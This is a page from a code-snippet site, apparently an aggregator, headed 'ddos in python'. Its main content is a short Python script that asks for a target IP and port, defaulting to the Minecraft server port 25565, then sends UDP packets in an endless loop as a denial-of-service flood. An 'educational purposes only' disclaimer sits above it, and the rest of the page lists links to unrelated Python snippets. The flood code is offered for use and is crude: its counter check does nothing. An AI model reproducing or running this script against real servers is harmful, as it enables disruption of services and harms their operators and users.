Search
 
SCRIPT & CODE EXAMPLE
 

PYTHON

ddos in python

import socket
   
print("Warning!!!! This Script is no joke and it is for educational purposes only, I'm not responsible for any damage caused by this script")
print("To insert the default port write 0")
ip = input('IP >> ')
port = int(input('Port (Default: 25565) >> '))

if port == 0:
      port = 25565

while True:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
   s.connect((ip, port))
   i = 0
   if i < 10:
      s.send(b'x01')


Comment

python ddos

Wait, why?
Comment

PREVIOUS NEXT
Code Example
Python :: telegram markdown syntax 
Python :: droaw heat map in python for null values 
Python :: plot categorical data matplotlib 
Python :: how to read pdf in python 
Python :: how to print numbers from 1 to 20 in python 
Python :: django integer field example 
Python :: Installing yfinance using pip 
Python :: marks input using list in python 
Python :: how to create progress bar python 
Python :: load saved model 
Python :: name exit not defined python 
Python :: install os python 
Python :: How to find least common multiple of two numbers in Python 
Python :: fraction thesis 
Python :: how to print char of element in list of pytohn 
Python :: send embed discord.py 
Python :: href in selenium 
Python :: wtf forms required 
Python :: python nltk tokenize 
Python :: use beautifulsoup 
Python :: django install whitenoise 
Python :: why when I merge my label cluster with my dataframe i get more row 
Python :: py spam message 
Python :: nodemon python 
Python :: get median of column pandas 
Python :: python plot two lines on same graph 
Python :: convert python pandas series dtype to datetime 
Python :: print key of dictionary python 
Python :: random numbers in python 
Python :: python sort with comparator 
ADD CONTENT
Topic
Content
Source link
Name
5+6 =